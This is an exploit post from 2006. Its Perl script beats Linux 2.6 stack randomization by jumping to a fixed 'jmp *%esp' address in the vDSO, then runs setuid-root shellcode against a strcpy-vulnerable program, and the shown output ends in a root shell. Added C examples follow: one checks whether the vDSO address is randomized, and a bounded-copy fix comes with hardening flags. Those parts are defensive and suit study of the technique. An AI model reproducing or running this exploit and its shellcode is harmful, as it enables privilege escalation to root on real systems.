exp_jmp_rand.pl.txt

Posted Aug 17, 2006
Authored by Andrea Purificato | Site rawlab.altervista.org

Exploit solution against Linux kernel 2.6 stack randomization using the jmp *%esp technique.

tags | exploit, kernel
systems | linux
SHA-256 | 50a882d748cd436140df3f15901fee6e21f635b7cf433b54fac79e42d350c913

#!/usr/bin/perl -w
use strict;
#
# [exp_jmp_rand.pl] Mon Apr 3 19:17:14 CEST 2006
#
# Exploit solution against 2.6 stack randomization
# using the "jmp *%esp" technique.
#
# Copyright: bunker - https://rawlab.altervista.org
# 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
#
#
# EXPLANATION: In 2.6 kernels every process has a "ghost" library
# named "linux-gate.so.1". It's a virtual DSO, a shared
# object exposed by the kernel at a fixed address
# in every process' memory. That region
# isn't randomized, so we can search it for
# useful "call" or "jmp" instructions!
# In this example we find a "jmp *%esp" there,
# so we can execute shellcode on the stack ;-)
#
#
# [Find "jmp *%esp" in memory]
#
# bunker@syn:~/vuln$ ldd vuln_prog
# linux-gate.so.1 => (0xffffe000) <--- NOT RANDOM
# libc.so.6 => /lib/tls/libc.so.6 (0xb7e84000)
# /lib/ld-linux.so.2 (0xb7fcd000)
#
# bunker@syn:~/vuln$ gdb vuln_prog
# (gdb) break main
# Breakpoint 1 at 0x80483ad
# (gdb) run
# Starting program: /home/bunker/vuln/vuln_prog
# Breakpoint 1, 0x080483ad in main ()
# (gdb) x/i 0xffffe000
# 0xffffe000: jg 0xffffe047
# (gdb)
# 0xffffe002: dec %esp
# (gdb)
# 0xffffe003: inc %esi
# ...
# (gdb)
# 0xffffe777: jmp *%esp <- Interesting, use this!!
#
# bunker@syn:~/vuln$ cat vuln_prog.c
# int main(int argc, char **argv) {
# char buf[256];
# strcpy(buf, argv[1]);
# }
#
# bunker@syn:~/vuln$ ls -al vuln_prog
# -rwsr-sr-x 1 root users 8340 2006-04-02 20:11 vuln_prog
#
# bunker@syn:~/vuln$ perl exp_jmp_rand.pl 68
# sh-3.1# id
# uid=0(root) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)

die "Usage: $0 <num>\n [ vuln_buf < 4byte_ret * num ]\n"
if ($#ARGV != 0);

my $num = $ARGV[0];
print "Using multiplication factor $num...\n";

# jmp *%esp
my $ret = 0xffffe777;

# shellcode
my $sc = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x6a\x0b\x58".
"\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e".
"\x89\xe3\x52\x53\x89\xe1\xcd\x80";

# vulnerable file
my $vuln = "./vuln_prog";

# build buffer: $num copies of the return address, then the shellcode
# ('x' binds tighter than '.', so the repeat happens first)
my $buf = pack("L",$ret)x$num . $sc;

# boom! :-D
exec $vuln, $buf;
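The whole technique rests on one precondition, visible in the ldd output above: linux-gate.so.1 is mapped at the same address (0xffffe000) in every process, so the jmp *%esp at 0xffffe777 can be hard-coded into the script. A defender who wants to know whether a machine still offers that shortcut can sample the vDSO base across freshly started processes and see whether it moves. The C program below is an added example, not part of the original post; it assumes a Linux /proc filesystem and the `[vdso]` label that /proc/<pid>/maps gives this mapping, and SAMPLE_MAPS_FIXED is a constructed fixture modelled on the ldd listing, not a real capture.

```c
/* vdso_check.c: report whether the vDSO ("linux-gate.so.1", shown as [vdso]
 * in /proc/<pid>/maps) lands at the same address in every new process.
 * That is the precondition the exploit above hard-codes (0xffffe777).
 * Added example, not part of the original post; assumes Linux /proc. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed fixture modelled on the ldd output in the post: a 2006-era
 * 32-bit layout with the vDSO at 0xffffe000. Not a real capture. */
static const char SAMPLE_MAPS_FIXED[] =
    "08048000-08049000 r-xp 00000000 08:01 1234 /home/bunker/vuln/vuln_prog\n"
    "b7e84000-b7fa9000 r-xp 00000000 08:01 5678 /lib/tls/libc.so.6\n"
    "bffeb000-c0000000 rw-p 00000000 00:00 0    [stack]\n"
    "ffffe000-fffff000 r-xp 00000000 00:00 0    [vdso]\n";

/* Return the start address of the [vdso] mapping in one maps listing,
 * or 0 if no such line exists. Pure text parsing, so it can be checked
 * against constructed input. */
unsigned long vdso_base_from_maps(const char *maps)
{
    const char *line = maps;
    while (line && *line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        const char *tag = strstr(line, "[vdso]");
        if (tag && tag < line + len)
            return strtoul(line, NULL, 16);   /* "start-end ..." parses up to '-' */
        line = eol ? eol + 1 : NULL;
    }
    return 0;
}

/* Spawn n fresh processes (each `cat` reads its *own* /proc/self/maps) and
 * count the distinct vDSO bases seen. Returns 0 if maps could not be read;
 * 1 means the address is fixed, i.e. a trampoline there is predictable. */
int count_distinct_vdso_bases(int n)
{
    unsigned long seen[64];
    int distinct = 0;
    if (n > 64) n = 64;
    for (int i = 0; i < n; i++) {
        FILE *p = popen("cat /proc/self/maps", "r");
        if (!p) return 0;
        static char buf[1 << 16];
        size_t got = fread(buf, 1, sizeof buf - 1, p);
        buf[got] = '\0';
        pclose(p);
        unsigned long base = vdso_base_from_maps(buf);
        if (base == 0) return 0;
        int j;
        for (j = 0; j < distinct; j++)
            if (seen[j] == base) break;
        if (j == distinct) seen[distinct++] = base;
    }
    return distinct;
}

int main(void)
{
    int d = count_distinct_vdso_bases(16);
    if (d == 0) {
        puts("could not read [vdso] from /proc/self/maps (not Linux?)");
        return 2;
    }
    printf("%d distinct vDSO base(s) across 16 processes: %s\n", d,
           d == 1 ? "FIXED - a jmp *%esp trampoline address is predictable"
                  : "randomized");
    return d == 1 ? 1 : 0;
}
```

On a kernel of the era this prints one distinct base, matching the `NOT RANDOM` remark in the header comment; on a current kernel with kernel.randomize_va_space set to 2 the base changes on every exec and the hard-coded 0xffffe777 no longer points at anything useful. Note that fork alone would not do: a forked child inherits the parent's mappings, which is why the sampler goes through a fresh exec each time.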
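On the victim side the root cause is the unbounded strcpy in vuln_prog.c, turned into a root shell by the setuid bit in the `ls -al` listing. Below, as an added example rather than the post's own code, is the same program with the copy bounded so that an argument that does not fit in buf[] is rejected instead of overwriting the saved return address; the original copy is kept alongside for comparison.

```c
/* vuln_prog_fixed.c: the program from the post with the unbounded strcpy
 * replaced by a bounded copy. Added example, not the author's code. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256

/* Copy src into dst (capacity dstsz) only if it fits, NUL included.
 * Returns 0 on success, -1 if src is too long; dst is left untouched on
 * failure so a caller cannot pick up a half-copied string by mistake. */
int copy_arg_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strnlen(src, dstsz);   /* never scans past dstsz bytes */
    if (n >= dstsz)
        return -1;                    /* no room for the terminator */
    memcpy(dst, src, n + 1);
    return 0;
}

/* The original body, kept only for comparison: strcpy copies until the
 * source NUL regardless of how large buf is, so an argv[1] longer than
 * 256 bytes runs over the saved return address. That is exactly what the
 * script above feeds it ($num copies of the trampoline, then shellcode). */
void copy_arg_unbounded(char *dst, const char *src)
{
    strcpy(dst, src);
}

int main(int argc, char **argv)
{
    char buf[BUF_SIZE];
    if (argc != 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    if (copy_arg_bounded(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n", sizeof buf - 1);
        return 1;
    }
    printf("copied %zu bytes\n", strlen(buf));
    return 0;
}
```

Build it with `-fstack-protector-strong` and link with `-Wl,-z,noexecstack`: the canary catches an overwrite before the return address is used, and with a non-executable stack a jmp *%esp trampoline lands on memory that cannot run, so even a fixed vDSO address gives nothing to return into. Dropping the setuid bit unless the program genuinely needs it removes the privilege gain entirely.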